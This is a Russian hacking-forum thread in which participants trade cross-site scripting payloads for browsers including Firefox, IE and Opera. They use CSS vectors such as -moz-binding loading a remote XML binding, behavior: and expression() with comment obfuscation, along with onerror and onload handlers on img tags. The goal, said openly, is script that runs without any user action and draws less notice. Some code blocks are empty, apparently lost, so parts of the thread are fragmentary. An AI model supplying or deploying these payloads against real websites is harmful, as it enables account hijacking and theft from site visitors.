|
Насчет событий onMouseOver итд
Имхо , вместо того чтобы использовать js события у тегов вроде <a> лучше юзать xss через стили . Меньше палева и не надо действий от юзера.Работает в firefox ( -moz-binding) и в ие , опера к сожалению не понимает таких действ.
Код:
<a href="#" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);xxs:expression(alert(123))">123</a> |
как вариант, использовать бехавиор:
Код:
style="behavior: url(myscript.js);"Код:
style="behavior: expression(alert('=\'))" |
ИМХО, дело не в том, чтобы не использовать события, а чтобы все работало без действий юзера. Вот минималка для Оперы 9.20 до кучи
PHP код:
|
Код:
style="{ left:exp/**/ression( alert('xss') ) }"Код HTML:
1. FSCommand() (attacker can use this when executed from within an embedded Flash object) |
Угу , если img`у задать пустой src , то можно юзать onerror
|
Угу, только есть опять нюансы:
1) при onerror с пустым урл в img опять-таки пошлёт Опера 9.20 Выход: комбинировать onerror со style по модели, приведенной мною в предыдущем посте. Будет работать везде. 2) если мы можем изменять сами src тега img (а такого может и не быть), то про проблемы обработчика onerror в разных браузерах вообще можно забыть. Onload - будет достаточно. Однако если уж очень хочется, приведу то, что увидел недавно в посте Cenarius'a (привожу в качестве источника). Будет работать везде. PHP код:
PHP код:
3) img - вообще тема другая, а onerror с ним - палево конкретное. ___________________________ ___________________________ Резюме из всех постов касательно темы: С тегом <a> без действий юзера во всех браузерах будет работать только это PHP код:
|
| Время: 07:00 |